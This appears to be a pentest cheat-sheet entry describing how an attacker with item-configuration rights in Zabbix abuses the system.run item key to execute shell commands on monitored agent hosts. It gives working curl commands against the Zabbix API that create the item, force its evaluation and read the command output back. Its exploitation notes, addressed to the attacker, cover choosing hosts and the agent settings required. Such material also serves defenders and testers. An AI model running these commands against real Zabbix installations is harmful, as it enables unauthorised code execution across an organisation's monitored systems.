A Zabbix item defines what to collect, and the system.run[command,mode] item key runs an arbitrary shell command on the target host's Zabbix agent when the item is evaluated. An attacker with permission to create or modify items on a host (through the UI or the API's item.create/item.update) adds a system.run item pointing at their command, then forces or waits for its evaluation, and the command executes on that agent's host. Because the agent runs on monitored systems throughout the environment, this is a path to code execution on many hosts, not just the Zabbix server, limited to the hosts the attacker's role can configure and whose agents permit system.run.
Z=https://<target>/zabbix/api_jsonrpc.php; H='Content-Type: application/json-rpc'
# create a system.run item on a host (hostid from host.get), then check it
curl -sk $Z -H "$H" -d '{"jsonrpc":"2.0","method":"item.create","params":{
"name":"x","key_":"system.run[id]","hostid":"<HOSTID>","type":0,
"value_type":4,"interfaceid":"<IFID>","delay":"10s"},"auth":"'"$TOK"'","id":1}'
# trigger immediate evaluation (task.create ExecuteNow) or wait for the delay, then read the value
curl -sk $Z -H "$H" -d '{"jsonrpc":"2.0","method":"item.get","params":{"search":{"key_":"system.run"},"output":["lastvalue"]},"auth":"'"$TOK"'","id":1}'
Exploitation notes#
- The command runs on the agent host (not the server), so this reaches monitored systems across the estate, pick a host whose agent you can configure and that permits
system.run. - Agents gate
system.run: older agents needEnableRemoteCommands=1, newer agents need anAllowKey=system.run[*](denied by default), so execution depends on the agent's config, see Agent remote commands. - The command output is captured as the item's value (
value_typetext), so you read results back throughitem.get lastvalue; usetask.create(ExecuteNow) to trigger immediately rather than waiting for the poll. - This requires item-configuration rights on the target host; a Super admin has them everywhere, while a limited role may only reach some hosts.